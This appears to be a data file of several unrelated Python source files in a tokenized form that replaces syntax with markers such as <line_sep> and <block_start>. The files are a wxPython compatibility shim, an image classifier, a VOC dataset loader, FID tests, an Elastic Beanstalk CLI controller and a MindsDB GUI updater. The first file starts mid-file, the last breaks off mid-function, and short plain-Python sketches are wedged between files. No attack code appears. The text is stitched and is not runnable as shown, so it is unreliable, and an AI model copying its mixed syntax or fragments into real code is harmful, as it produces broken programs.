'ScrolledWindow') ('PySimpleApp' 'App') ('PyTextDataObject' 'TextDataObject') ('PyTimer' 'Timer') ('PyTipProvider' 'adv.TipProvider') ('PyValidator' 'Validator') ('PyWindow'<concat>', Window')]<line_sep>font_families=[(wx.DEFAULT wx.FONTFAMILY_DEFAULT) (wx.DECORATIVE wx.FONTFAMILY_DECORATIVE) (wx.ROMAN wx.FONTFAMILY_ROMAN) (wx.SCRIPT wx.FONTFAMILY_SCRIPT) (wx.SWISS wx.FONTFAMILY_SWISS) (wx.MODERN wx.FONTFAMILY_MODERN) (wx.TELETYPE wx.FONTFAMILY_TELETYPE)]<line_sep>font_weights=[(wx.NORMAL wx.FONTWEIGHT_NORMAL) (wx.LIGHT wx.FONTWEIGHT_LIGHT) (wx.BOLD wx.FONTWEIGHT_BOLD)]<line_sep>font_styles=[(wx.NORMAL wx.FONTSTYLE_NORMAL) (wx.ITALIC wx.FONTSTYLE_ITALIC) (wx.SLANT wx.FONTSTYLE_SLANT)]<line_sep>pen_styles=[(wx.SOLID wx.PENSTYLE_SOLID) (wx.DOT wx.PENSTYLE_DOT) (wx.LONG_DASH wx.PENSTYLE_LONG_DASH) (wx.SHORT_DASH wx.PENSTYLE_SHORT_DASH) (wx.DOT_DASH wx.PENSTYLE_DOT_DASH) (wx.USER_DASH wx.PENSTYLE_USER_DASH) (wx.TRANSPARENT wx.PENSTYLE_TRANSPARENT)]<line_sep>brush_styles=[(wx.SOLID wx.BRUSHSTYLE_SOLID) (wx.TRANSPARENT wx.BRUSHSTYLE_TRANSPARENT) (wx.STIPPLE_MASK_OPAQUE wx.BRUSHSTYLE_STIPPLE_MASK_OPAQUE) (wx.STIPPLE_MASK wx.BRUSHSTYLE_STIPPLE_MASK) (wx.STIPPLE wx.BRUSHSTYLE_STIPPLE) (wx.BDIAGONAL_HATCH wx.BRUSHSTYLE_BDIAGONAL_HATCH) (wx.CROSSDIAG_HATCH wx.BRUSHSTYLE_CROSSDIAG_HATCH) (wx.FDIAGONAL_HATCH wx.BRUSHSTYLE_FDIAGONAL_HATCH) (wx.CROSS_HATCH wx.BRUSHSTYLE_CROSS_HATCH) (wx.HORIZONTAL_HATCH wx.BRUSHSTYLE_HORIZONTAL_HATCH) (wx.VERTICAL_HATCH wx.BRUSHSTYLE_VERTICAL_HATCH) ]<def_stmt>find_module module<block_start><for_stmt>m 
modnames<block_start><if_stmt>module.__name__<in>m<block_start><return>m<block_end><block_end><block_end><def_stmt>find_enum enums item<block_start><for_stmt>en enums<block_start><if_stmt>item<in>en<block_start>value=en[1]<if>wx4<else>en[0]<line_sep><return>value<block_end><block_end><block_end><def_stmt>get_wx_mod base module<block_start>mname=find_module(module)[1]<if>wx4<else>find_module(module)[0]<line_sep>bname=base.__name__<if_stmt>'.'<in>mname<block_start>spl=[i<for>i mname.split('.')<if>i<ne>bname]<line_sep>modname='.'.join(spl[:-1])<line_sep>mod=importlib.import_module('{}.{}'.format(bname modname))<line_sep><return>getattr(mod spl[-1])<block_end><else_stmt><block_start><return>getattr(base mname)<block_end><block_end>@contextmanager<def_stmt>wx_mod base module<block_start>''' Identify and import the appropriate wxPython module '''<line_sep><yield>get_wx_mod(base module)<block_end>@contextmanager<def_stmt>set_font_style style<block_start><yield>find_enum(font_styles style)<block_end>@contextmanager<def_stmt>set_font_weight weight<block_start><yield>find_enum(font_weights weight)<block_end>@contextmanager<def_stmt>set_font_family family<block_start><yield>find_enum(font_families family)<block_end>@contextmanager<def_stmt>set_pen_style style<block_start><yield>find_enum(pen_styles style)<block_end>@contextmanager<def_stmt>set_brush_style style<block_start><yield>find_enum(brush_styles style)<block_end>@contextmanager<def_stmt>create_measuring_context <block_start>dc=wx.GraphicsContext.Create()<if>wx4<else>wx.GraphicsContext.CreateMeasuringContext()<line_sep><yield>dc<block_end><class_stmt>Wx3ToolBar(wx.ToolBar)<block_start>''' Special toolbar class that accepts wxPython 4-style AddTool command and converts it to a wxPython 3-style AddLabelTool command '''<def_stmt>__init__ self parent id=wx.ID_ANY pos=wx.DefaultPosition size=wx.DefaultSize style=wx.TB_HORIZONTAL name='toolbar'<block_start>wx.ToolBar.__init__(self parent id pos size style name)<block_end><def_stmt>AddTool self toolId label bitmap bmpDisabled=wx.NullBitmap kind=wx.ITEM_NORMAL shortHelp='' longHelp='' clientData=<none><block_start>''' Override to make this a very thin wrapper for AddLabelTool, which in wxPython 3 is the same as AddTool in wxPython 4 '''<line_sep><return>self.AddLabelTool(id=toolId label=label bitmap=bitmap bmpDisabled=bmpDisabled kind=kind shortHelp=shortHelp longHelp=longHelp clientData=clientData)<block_end><block_end><class_stmt>Wx4ToolBar(wx.ToolBar)<block_start>''' Special toolbar class that accepts wxPython 3-style AddLabelTool command and converts it to a wxPython 4-style AddTool command '''<def_stmt>__init__ self parent id=wx.ID_ANY pos=wx.DefaultPosition size=wx.DefaultSize style=wx.TB_HORIZONTAL name='toolbar'<block_start>wx.ToolBar.__init__(self parent id pos size style name)<block_end><def_stmt>AddLabelTool self id label bitmap bmpDisabled=wx.NullBitmap kind=wx.ITEM_NORMAL shortHelp='' longHelp='' clientData=<none><block_start>''' Override to make this a very thin wrapper for AddTool, which in wxPython 4 is the same as AddLabelTool in wxPython 3 '''<line_sep><return>self.AddTool(toolId=id label=label bitmap=bitmap bmpDisabled=bmpDisabled kind=kind shortHelp=shortHelp longHelp=longHelp clientData=clientData)<block_end><block_end># Use this ToolBar class to create toolbars in frames ToolBar=Wx4ToolBar<if>wx4<else>Wx3ToolBar<line_sep>
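The enum helpers above reduce to picking the first or second member of each (wx3, wx4) pair depending on the detected wxPython version; a wx-free sketch of that selection rule, with hypothetical constant names:
pairs = [("OLD_SOLID", "NEW_BRUSHSTYLE_SOLID"), ("OLD_DOT", "NEW_PENSTYLE_DOT")]

def pick(pairs, item, use_wx4):
    for old, new in pairs:
        if item in (old, new):
            return new if use_wx4 else old

assert pick(pairs, "OLD_SOLID", use_wx4=True) == "NEW_BRUSHSTYLE_SOLID"
assert pick(pairs, "NEW_PENSTYLE_DOT", use_wx4=False) == "OLD_DOT"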
<import_stmt>torch.nn<as>nn<import_stmt>pretrainedmodels<class_stmt>classifier(nn.Module)<block_start><def_stmt>__init__ self model_name='resnet34'<block_start>super(classifier self).__init__()<line_sep># Load pretrained ImageNet model self.model=pretrainedmodels.__dict__[model_name](num_classes=1000 pretrained='imagenet')<line_sep>print(model_name+' model settings:')<for_stmt>var pretrainedmodels.pretrained_settings[model_name]['imagenet']<block_start>print('\t'+var+': '+str(pretrainedmodels.pretrained_settings[model_name]['imagenet'][var]))<block_end># Define last layer for fine-tuning: dropout followed by a linear head for a single logit dim_feats=self.model.last_linear.in_features<line_sep>nb_classes=1<line_sep>self.model.last_linear=nn.Sequential(nn.Dropout(p=0.50) nn.Linear(dim_feats nb_classes))<block_end><def_stmt>forward self input<block_start><return>self.model(input)<block_end><def_stmt>set_mode self mode<block_start>self.mode=mode<if_stmt>'validation'<in>mode<or>'test'<in>mode<block_start>self.eval()<block_end><elif_stmt>'train'<in>mode<block_start>self.train()<block_end><else_stmt><block_start><raise>NotImplementedError<block_end><block_end><block_end>
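A hedged usage sketch for the classifier above (assumes torch and pretrainedmodels are installed and the ImageNet weights can be downloaded); the batch shape follows the 224x224 input size that pretrainedmodels reports for resnet34:
import torch

model = classifier(model_name='resnet34')
model.set_mode('test')                       # switches the module to eval()
with torch.no_grad():
    logits = model(torch.randn(2, 3, 224, 224))
print(logits.shape)                          # torch.Size([2, 1]) -- one logit per image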
# -------------------------------------------------------- # Fast R-CNN # Copyright (c) 2015 Microsoft # Licensed under The MIT License [see LICENSE for details] # Written by <NAME> # Extended by <NAME> # -------------------------------------------------------- <import_stmt>os<import_stmt>cv2<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>torch.utils.data<as>data<import_stmt>xml.etree.ElementTree<as>ET<import_from_stmt>utils.bbox quad_2_rbox<class_stmt>VOCDataset(data.Dataset)<block_start>"""Pascal VOC detection dataset that converts quad annotations to rotated boxes."""<def_stmt>__init__ self dataset='trainval.txt' augment=<false> level=1 random_flip=<true><block_start>self.image_set=dataset<line_sep>self.data_path=self.image_set.split('/ImageSets/')[0]<line_sep>self.image_ext=[".jpg"]<line_sep>self.image_list=self._load_image_names()<line_sep>self.classes=('__background__' 'aeroplane' 'bicycle' 'bird' 'boat' 'bottle' 'bus' 'car' 'cat' 'chair' 'cow' 'diningtable' 'dog' 'horse' 'motorbike' 'person' 'pottedplant' 'sheep' 'sofa' 'train' 'tvmonitor')<line_sep>self.num_classes=len(self.classes)<line_sep>self.class_to_ind=dict(zip(self.classes range(self.num_classes)))<line_sep>self.random_flip=random_flip<block_end><def_stmt>__len__ self<block_start><return>len(self.image_list)<block_end><def_stmt>__getitem__ self index<block_start>im_path=self._image_path_from_index(self.image_list[index])<line_sep>im=cv2.cvtColor(cv2.imread(im_path cv2.IMREAD_COLOR) cv2.COLOR_BGR2RGB)<line_sep>roidb=self._load_pascal_annotation(self.image_list[index])<line_sep>gt_inds=np.where(roidb['gt_classes']<ne>0)[0]<line_sep>bboxes=roidb['boxes'][gt_inds :]<line_sep>classes=roidb['gt_classes'][gt_inds]<if_stmt>self.random_flip<and>np.random.rand()<ge>0.5<block_start>im=cv2.flip(im 1 <none>)<line_sep>oldxs=bboxes[: 0::2].copy()<line_sep>bboxes[: 0::2]=im.shape[1]-oldxs-1<block_end>gt_boxes=np.empty((len(gt_inds) 6) dtype=np.float32)<for_stmt>i,bbox enumerate(bboxes)<block_start>gt_boxes[i :5]=quad_2_rbox(np.array(bbox))<line_sep>gt_boxes[i 5]=classes[i]<block_end><return>{'image':im 'boxes':gt_boxes}<block_end><def_stmt>_load_image_names self<block_start>""" Load the names listed in this dataset's image set file. """<line_sep>image_set_file=self.image_set<if_stmt><not>os.path.exists(image_set_file)<block_start>print('Path does not exist: {}'.format(image_set_file))<line_sep>image_names=[]<block_end><else_stmt><block_start><with_stmt>open(image_set_file)<as>f<block_start>image_names=[x.strip()<for>x f.readlines()]<block_end><block_end><return>image_names<block_end><def_stmt>_image_path_from_index self index<block_start>""" Construct an image path from the image's "index" identifier. """<line_sep>image_path=<none><line_sep>image_exist=<false><for_stmt>image_ext self.image_ext<block_start>image_path=os.path.join(self.data_path 'JPEGImages' index+image_ext)<if_stmt>os.path.exists(image_path)<block_start>image_exist=<true><line_sep><break><block_end><block_end><if_stmt><not>image_exist<block_start><raise>Exception('Image path does not exist: {}'.format(os.path.join(self.data_path 'JPEGImages' index)))<block_end><return>image_path<block_end><def_stmt>_load_pascal_annotation self index<block_start>""" Load image and bounding boxes info from XML file in the PASCAL VOC format. 
"""<line_sep>filename=os.path.join(self.data_path 'Annotations' index+'.xml')<line_sep>tree=ET.parse(filename)<line_sep>objs=tree.findall('object')<line_sep>boxes,gt_classes=[] []<for_stmt>_,obj enumerate(objs)<block_start>difficult=int(obj.find('difficult').text)<line_sep>is_latin=obj.find('language')<is><none><or>obj.find('language').text<eq>'Latin'<line_sep>bnd_box=obj.find('bndbox')<line_sep>box=[float(bnd_box.find('xmin').text) float(bnd_box.find('ymin').text) float(bnd_box.find('xmax').text) float(bnd_box.find('ymin').text) float(bnd_box.find('xmax').text) float(bnd_box.find('ymax').text) float(bnd_box.find('xmin').text) float(bnd_box.find('ymax').text) ]<line_sep>label=self.class_to_ind[obj.find('name').text.lower().strip()]<if_stmt>difficult<block_start><continue><block_end># if self.only_latin and not is_latin: # continue boxes.append(box)<line_sep>gt_classes.append(label)<block_end><return>{'boxes':np.array(boxes dtype=np.int32) 'gt_classes':np.array(gt_classes)}<block_end><def_stmt>image_path_at self i<block_start>""" Return the absolute path to image i in the image sequence. """<line_sep><return>self._image_path_from_index(self.image_list[i])<block_end><def_stmt>return_class self id<block_start>id=int(id)<line_sep><return>self.classes[id]<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><pass><block_end>
<import_stmt>numpy<as>np<import_stmt>pytest<import_stmt>torch<import_from_stmt>PIL Image<import_from_stmt>pytorch_fid fid_score inception<line_sep>@pytest.fixture<def_stmt>device <block_start><return>torch.device('cpu')<block_end><def_stmt>test_calculate_fid_given_statistics mocker tmp_path device<block_start>dim=2048<line_sep>m1,m2=np.zeros((dim )) np.ones((dim ))<line_sep>sigma=np.eye(dim)<def_stmt>dummy_statistics path model batch_size dims device num_workers<block_start><if_stmt>path.endswith('1')<block_start><return>m1 sigma<block_end><elif_stmt>path.endswith('2')<block_start><return>m2 sigma<block_end><else_stmt><block_start><raise>ValueError<block_end><block_end>mocker.patch('pytorch_fid.fid_score.compute_statistics_of_path' side_effect=dummy_statistics)<line_sep>dir_names=['1' '2']<line_sep>paths=[]<for_stmt>name dir_names<block_start>path=tmp_path/name<line_sep>path.mkdir()<line_sep>paths.append(str(path))<block_end>fid_value=fid_score.calculate_fid_given_paths(paths batch_size=dim device=device dims=dim num_workers=0)<line_sep># Given equal covariance, FID is just the squared norm of difference <assert_stmt>fid_value<eq>np.sum((m1-m2)<power>2)<block_end><def_stmt>test_compute_statistics_of_path mocker tmp_path device<block_start>model=mocker.MagicMock(inception.InceptionV3)()<line_sep>model.side_effect=<lambda>inp:[inp.mean(dim=(2 3) keepdim=<true>)]<line_sep>size=(4 4 3)<line_sep>arrays=[np.zeros(size) np.ones(size)<times>0.5 np.ones(size)]<line_sep>images=[(arr<times>255).astype(np.uint8)<for>arr arrays]<line_sep>paths=[]<for_stmt>idx,image enumerate(images)<block_start>paths.append(str(tmp_path/'{}.png'.format(idx)))<line_sep>Image.fromarray(image mode='RGB').save(paths[-1])<block_end>stats=fid_score.compute_statistics_of_path(str(tmp_path) model batch_size=len(images) dims=3 device=device num_workers=0)<assert_stmt>np.allclose(stats[0] np.ones((3 ))<times>0.5 atol=1e-3)<assert_stmt>np.allclose(stats[1] np.ones((3 3))<times>0.25)<block_end><def_stmt>test_compute_statistics_of_path_from_file mocker tmp_path device<block_start>model=mocker.MagicMock(inception.InceptionV3)()<line_sep>mu=np.random.randn(5)<line_sep>sigma=np.random.randn(5 5)<line_sep>path=tmp_path/'stats.npz'<with_stmt>path.open('wb')<as>f<block_start>np.savez(f mu=mu sigma=sigma)<block_end>stats=fid_score.compute_statistics_of_path(str(path) model batch_size=1 dims=5 device=device num_workers=0)<assert_stmt>np.allclose(stats[0] mu)<assert_stmt>np.allclose(stats[1] sigma)<block_end><def_stmt>test_image_types tmp_path<block_start>in_arr=np.ones((24 24 3) dtype=np.uint8)<times>255<line_sep>in_image=Image.fromarray(in_arr mode='RGB')<line_sep>paths=[]<for_stmt>ext fid_score.IMAGE_EXTENSIONS<block_start>paths.append(str(tmp_path/'img.{}'.format(ext)))<line_sep>in_image.save(paths[-1])<block_end>dataset=fid_score.ImagePathDataset(paths)<for_stmt>img dataset<block_start><assert_stmt>np.allclose(np.array(img) in_arr)<block_end><block_end>
<import_from_stmt>scripts.test shared<import_from_stmt>. utils<class_stmt>EmscriptenFinalizeTest(utils.BinaryenTestCase)<block_start><def_stmt>do_output_test self args# without any output file specified, don't error, don't write the wasm, # but do emit metadata <block_start>p=shared.run_process(shared.WASM_EMSCRIPTEN_FINALIZE+[self.input_path('empty_lld.wat') '--global-base=1024']+args capture_output=<true>)<line_sep># metadata is always present self.assertIn('{' p.stdout)<line_sep>self.assertIn('}' p.stdout)<line_sep><return>p.stdout<block_end><def_stmt>test_no_output self<block_start>stdout=self.do_output_test([])<line_sep># module is not present self.assertNotIn('(module' stdout)<block_end><def_stmt>test_text_output self<block_start>stdout=self.do_output_test(['-S'])<line_sep># module is present self.assertIn('(module' stdout)<block_end><block_end>
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. <import_stmt>textwrap<import_stmt>json<import_stmt>sys<import_stmt>os<import_from_stmt>cement.core controller<import_from_stmt>ebcli __version__<import_from_stmt>ebcli.core.ebglobals Constants<import_from_stmt>ebcli.lib elasticbeanstalk utils<import_from_stmt>ebcli.core io fileoperations<import_from_stmt>ebcli.objects.exceptions NoEnvironmentForBranchError PlatformWorkspaceNotSupportedError ApplicationWorkspaceNotSupportedError EBCLIException NotInitializedError <import_from_stmt>ebcli.resources.strings strings flag_text<import_from_stmt>ebcli.objects region<import_from_stmt>ebcli.operations commonops<class_stmt>AbstractBaseController(controller.CementBaseController)<block_start>""" This is an abstract base class that is useless on its own, but used by other classes to sub-class from and to share common commands and arguments. """<class_stmt>Meta<block_start>label='abstract'<line_sep>stacked_on='base'<line_sep>stacked_type='nested'<line_sep>arguments=[(['environment_name'] dict(action='store' nargs='?' default=[] help=flag_text['general.env'])) ]<line_sep>epilog=''<line_sep>usage='eb {cmd} <environment_name> [options ...]'<block_end><def_stmt>do_command self<block_start><pass><block_end>@classmethod<def_stmt>validate_workspace cls<block_start>workspace_type=fileoperations.get_workspace_type(<none>)<line_sep>is_platform_workspace_only_command=cls.Meta.__dict__.get('is_platform_workspace_only_command')<line_sep>requires_directory_initialization=cls.Meta.__dict__.get('requires_directory_initialization')<if_stmt>'--modules'<in>sys.argv<block_start><pass><block_end><elif_stmt>'--help'<in>sys.argv<block_start><pass><block_end><elif_stmt>cls.__name__<eq>'PlatformListController'<or>cls.__name__<eq>'EBPListController'<block_start><pass><block_end><elif_stmt>requires_directory_initialization<and><not>workspace_type<block_start><raise>NotInitializedError(strings['exit.notsetup'])<block_end><elif_stmt>is_platform_workspace_only_command<block_start><if_stmt>Constants.WorkSpaceTypes.APPLICATION<eq>workspace_type<block_start><raise>ApplicationWorkspaceNotSupportedError(strings['exit.applicationworkspacenotsupported'])<block_end><block_end><block_end>@controller.expose(hide=<true>)<def_stmt>default self<block_start>""" This command will be shared within all controllers that sub-class from here. 
It can also be overridden in the sub-class """<line_sep>self.validate_workspace()<line_sep>self.do_command()<line_sep>self.check_for_cli_update(__version__)<block_end><def_stmt>check_workspace_type self expected_type<block_start>workspace_type=fileoperations.get_workspace_type()<if_stmt>workspace_type<ne>expected_type<block_start><if_stmt>Constants.WorkSpaceTypes.PLATFORM<eq>workspace_type<block_start><raise>PlatformWorkspaceNotSupportedError(strings['exit.platformworkspacenotsupported'])<block_end><if_stmt>Constants.WorkSpaceTypes.APPLICATION<eq>workspace_type<block_start><raise>ApplicationWorkspaceNotSupportedError(strings['exit.applicationworkspacenotsupported'])<block_end><block_end><block_end><def_stmt>check_for_cli_update self version<block_start>label=self.Meta.label<if_stmt>label<in>('create' 'deploy' 'status' 'clone' 'config')<block_start><if_stmt>cli_update_exists(version)<block_start><if_stmt>self.check_install_script_used()<block_start>io.log_alert(strings['base.update_available_script_install'])<block_end><else_stmt><block_start>io.log_alert(strings['base.update_available'])<block_end><block_end><block_end><block_end><def_stmt>get_app_name self<block_start>app_name=fileoperations.get_application_name()<line_sep><return>app_name<block_end><def_stmt>get_env_name self cmd_example=<none> noerror=<false> varname='environment_name'<block_start>env_name=getattr(self.app.pargs varname <none>)<if_stmt><not>env_name<block_start>env_name=commonops.get_current_branch_environment()<block_end>workspace_type=fileoperations.get_workspace_type(Constants.WorkSpaceTypes.APPLICATION)<if_stmt><not>env_name<block_start><if_stmt>Constants.WorkSpaceTypes.PLATFORM<eq>workspace_type<block_start><raise>EBCLIException(strings['platform.nobuilderenv'])<block_end><if_stmt>noerror<block_start><return><none><block_end><if_stmt><not>cmd_example<block_start>message=strings['branch.noenv'].replace('{cmd}' self.Meta.label)<block_end><else_stmt><block_start>message=strings['branch.noenv'].replace('eb {cmd}' cmd_example)<block_end>io.log_error(message)<line_sep><raise>NoEnvironmentForBranchError()<block_end><return>env_name<block_end><def_stmt>check_install_script_used self<block_start><return>'.ebcli-virtual-env'<in>os.path.abspath(__file__)<block_end>@classmethod<def_stmt>_add_to_handler cls handler<block_start>handler.register(cls)<block_end>@property<def_stmt>_help_text self<block_start>""" Returns the help text displayed when for the commands of the type `eb <command> <subcommand>` except where <command> is "platform". 
"""<line_sep>longest=0<def_stmt>pad label<block_start>padlength=longest-len(label)+2<line_sep>padding=' '<if_stmt>padlength<l>0<block_start><for_stmt>x range(0 longest)<block_start>padding<augadd>' '<block_end><block_end><else_stmt><block_start><for_stmt>x range(0 padlength)<block_start>padding<augadd>' '<block_end><block_end><return>padding<block_end>help_txt=''<for_stmt>label self._visible_commands<block_start><if_stmt>len(label)<g>longest<block_start>longest=len(label)<block_end><block_end><for_stmt>label self._visible_commands<block_start>cmd=self._dispatch_map[label]<line_sep>cmd_txt=' '<line_sep>cmd_name=label<line_sep>cmd_aliases=cmd['aliases']<if_stmt>len(cmd_aliases)<g>0<and>cmd['aliases_only']<block_start>cmd_name=cmd_aliases.pop(0)<block_end>cmd_txt<augadd>'{}'.format(cmd_name)<if_stmt>cmd['help']<block_start>cmd_txt<augadd>'{}{}'.format(pad(cmd_txt) cmd['help'])<block_end><if_stmt>len(cmd_aliases)<g>0<block_start>cmd_txt<augadd>'\n{}(alias: {})'.format(pad('') ', '.join(cmd_aliases))<block_end>cmd_txt<augadd>'\n'<line_sep>help_txt<augadd>cmd_txt<block_end><if_stmt>len(help_txt)<g>0<block_start>txt='''{} commands: {} '''.format(self._meta.description help_txt)<block_end><else_stmt><block_start>txt=self._meta.description<block_end><return>textwrap.dedent(txt)<block_end><block_end><def_stmt>cli_update_exists current_version<block_start><try_stmt><block_start>data=utils.get_data_from_url('https://pypi.python.org/pypi/awsebcli/json' timeout=5)<line_sep>data=json.loads(data)<line_sep>latest=data['info']['version']<line_sep><return>latest<ne>current_version<block_end><except_stmt><block_start><return><false><block_end><block_end>
<import_from_stmt>distutils.version LooseVersion<import_stmt>requests<import_stmt>os<import_stmt>shutil<import_stmt>threading<import_stmt>webbrowser<import_from_stmt>zipfile ZipFile<import_from_stmt>pathlib Path<import_stmt>traceback<import_stmt>tempfile<line_sep># import concurrent.futures <import_from_stmt>flask Flask url_for make_response<import_from_stmt>flask.json dumps<import_from_stmt>flask_restx Api<import_from_stmt>mindsdb.__about__ __version__<as>mindsdb_version<import_from_stmt>mindsdb.interfaces.datastore.datastore DataStore<import_from_stmt>mindsdb.interfaces.model.model_interface ModelInterface<import_from_stmt>mindsdb.interfaces.database.integrations IntegrationController<import_from_stmt>mindsdb.utilities.ps is_pid_listen_port wait_func_is_true<import_from_stmt>mindsdb.utilities.telemetry inject_telemetry_to_static<import_from_stmt>mindsdb.utilities.config Config<import_from_stmt>mindsdb.utilities.log get_log<import_from_stmt>mindsdb.interfaces.storage.db session<import_from_stmt>mindsdb.utilities.json_encoder CustomJSONEncoder<class_stmt>Swagger_Api(Api)<block_start>""" This is a modification of the base Flask Restplus Api class due to the issue described here https://github.com/noirbizarre/flask-restplus/issues/223 """<line_sep>@property<def_stmt>specs_url self<block_start><return>url_for(self.endpoint("specs") _external=<false>)<block_end><block_end><def_stmt>custom_output_json data code headers=<none><block_start>resp=make_response(dumps(data) code)<line_sep>resp.headers.extend(headers<or>{})<line_sep><return>resp<block_end><def_stmt>get_last_compatible_gui_version <arrow>LooseVersion<block_start>log=get_log('http')<try_stmt><block_start>res=requests.get('https://mindsdb-web-builds.s3.amazonaws.com/compatible-config.json' timeout=5)<block_end><except_stmt>(ConnectionError requests.exceptions.ConnectionError)<as>e<block_start>print(f'Is no connection. 
{e}')<line_sep><return><false><block_end><except_stmt>Exception<as>e<block_start>print(f'Is something wrong with getting compatible-config.json: {e}')<line_sep><return><false><block_end><if_stmt>res.status_code<ne>200<block_start>print(f'Cant get compatible-config.json: returned status code = {res.status_code}')<line_sep><return><false><block_end><try_stmt><block_start>versions=res.json()<block_end><except_stmt>Exception<as>e<block_start>print(f'Cant decode compatible-config.json: {e}')<line_sep><return><false><block_end>current_mindsdb_lv=LooseVersion(mindsdb_version)<try_stmt><block_start>gui_versions={}<line_sep>max_mindsdb_lv=<none><line_sep>max_gui_lv=<none><for_stmt>el versions['mindsdb']<block_start><if_stmt>el['mindsdb_version']<is><none><block_start>gui_lv=LooseVersion(el['gui_version'])<block_end><else_stmt><block_start>mindsdb_lv=LooseVersion(el['mindsdb_version'])<line_sep>gui_lv=LooseVersion(el['gui_version'])<if_stmt>mindsdb_lv.vstring<not><in>gui_versions<or>gui_lv<g>gui_versions[mindsdb_lv.vstring]<block_start>gui_versions[mindsdb_lv.vstring]=gui_lv<block_end><if_stmt>max_mindsdb_lv<is><none><or>max_mindsdb_lv<l>mindsdb_lv<block_start>max_mindsdb_lv=mindsdb_lv<block_end><block_end><if_stmt>max_gui_lv<is><none><or>max_gui_lv<l>gui_lv<block_start>max_gui_lv=gui_lv<block_end><block_end>all_mindsdb_lv=[LooseVersion(x)<for>x gui_versions.keys()]<line_sep>all_mindsdb_lv.sort()<if_stmt>current_mindsdb_lv.vstring<in>gui_versions<block_start>gui_version_lv=gui_versions[current_mindsdb_lv.vstring]<block_end><elif_stmt>current_mindsdb_lv<g>all_mindsdb_lv[-1]<block_start>gui_version_lv=max_gui_lv<block_end><else_stmt><block_start>lower_versions={key:value<for>key,value gui_versions.items()<if>LooseVersion(key)<l>current_mindsdb_lv}<if_stmt>len(lower_versions)<eq>0<block_start>gui_version_lv=gui_versions[all_mindsdb_lv[0].vstring]<block_end><else_stmt><block_start>all_lower_versions=[LooseVersion(x)<for>x lower_versions.keys()]<line_sep>gui_version_lv=gui_versions[all_lower_versions[-1].vstring]<block_end><block_end><block_end><except_stmt>Exception<as>e<block_start>log.error(f'Error in compatible-config.json structure: {e}')<line_sep><return><false><block_end><return>gui_version_lv<block_end><def_stmt>get_current_gui_version <arrow>LooseVersion<block_start>config=Config()<line_sep>static_path=Path(config['paths']['static'])<line_sep>version_txt_path=static_path.joinpath('version.txt')<line_sep>current_gui_version=<none><if_stmt>version_txt_path.is_file()<block_start><with_stmt>open(version_txt_path 'rt')<as>f<block_start>current_gui_version=f.readline()<block_end><block_end>current_gui_lv=<none><if>current_gui_version<is><none><else>LooseVersion(current_gui_version)<line_sep><return>current_gui_lv<block_end><def_stmt>download_gui destignation version<block_start><if_stmt>isinstance(destignation str)<block_start>destignation=Path(destignation)<block_end>log=get_log('http')<line_sep>dist_zip_path=str(destignation.joinpath('dist.zip'))<line_sep>bucket="https://mindsdb-web-builds.s3.amazonaws.com/"<line_sep>resources=[{'url':bucket+'dist-V'+version+'.zip' 'path':dist_zip_path}]<def_stmt>get_resources resource<block_start>response=requests.get(resource['url'])<if_stmt>response.status_code<ne>requests.status_codes.codes.ok<block_start><raise>Exception(f"Error {response.status_code} GET {resource['url']}")<block_end>open(resource['path'] 'wb').write(response.content)<block_end><try_stmt><block_start><for_stmt>r 
resources<block_start>get_resources(r)<block_end><block_end><except_stmt>Exception<as>e<block_start>log.error(f'Error during downloading files from s3: {e}')<line_sep><return><false><block_end>static_folder=destignation<line_sep>static_folder.mkdir(mode=0o777 exist_ok=<true> parents=<true>)<line_sep>ZipFile(dist_zip_path).extractall(static_folder)<if_stmt>static_folder.joinpath('dist').is_dir()<block_start>shutil.move(str(destignation.joinpath('dist').joinpath('index.html')) static_folder)<line_sep>shutil.move(str(destignation.joinpath('dist').joinpath('assets')) static_folder)<line_sep>shutil.rmtree(destignation.joinpath('dist'))<block_end>os.remove(dist_zip_path)<line_sep>version_txt_path=destignation.joinpath('version.txt')# os.path.join(destignation, 'version.txt') <with_stmt>open(version_txt_path 'wt')<as>f<block_start>f.write(version)<block_end><return><true><line_sep>''' # to make downloading faster download each resource in a separate thread with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor: future_to_url = {executor.submit(get_resources, r): r for r in resources} for future in concurrent.futures.as_completed(future_to_url): res = future.result() if res is not None: raise res '''<block_end><def_stmt>initialize_static <block_start>success=update_static()<line_sep>session.close()<line_sep><return>success<block_end><def_stmt>update_static <block_start>''' Update Scout files basing on compatible-config.json content. Files will be downloaded and updated if new version of GUI > current. Current GUI version stored in static/version.txt. '''<line_sep>config=Config()<line_sep>log=get_log('http')<line_sep>static_path=Path(config['paths']['static'])<line_sep>last_gui_version_lv=get_last_compatible_gui_version()<line_sep>current_gui_version_lv=get_current_gui_version()<if_stmt>last_gui_version_lv<is><false><block_start><return><false><block_end><if_stmt>current_gui_version_lv<is><not><none><block_start><if_stmt>current_gui_version_lv<ge>last_gui_version_lv<block_start><return><true><block_end><block_end>log.info(f'New version of GUI available ({last_gui_version_lv.vstring}). Downloading...')<line_sep>temp_dir=tempfile.mkdtemp(prefix='mindsdb_gui_files_')<line_sep>success=download_gui(temp_dir last_gui_version_lv.vstring)<if_stmt>success<is><false><block_start>shutil.rmtree(temp_dir)<line_sep><return><false><block_end>temp_dir_for_rm=tempfile.mkdtemp(prefix='mindsdb_gui_files_')<line_sep>shutil.rmtree(temp_dir_for_rm)<line_sep>shutil.copytree(str(static_path) temp_dir_for_rm)<line_sep>shutil.rmtree(str(static_path))<line_sep>shutil.copytree(temp_dir str(static_path))<line_sep>shutil.rmtree(temp_dir_for_rm)<line_sep>log.info(f'GUI version updated to {last_gui_version_lv.vstring}')<line_sep><return><true><block_end><def_stmt>initialize_flask config init_static_thread no_studio# Apparently there's a bug that causes the static path not to work if it's '/' -- https://github.com/pallets/flask/issues/3134, I think '' should achieve the same thing (???) 
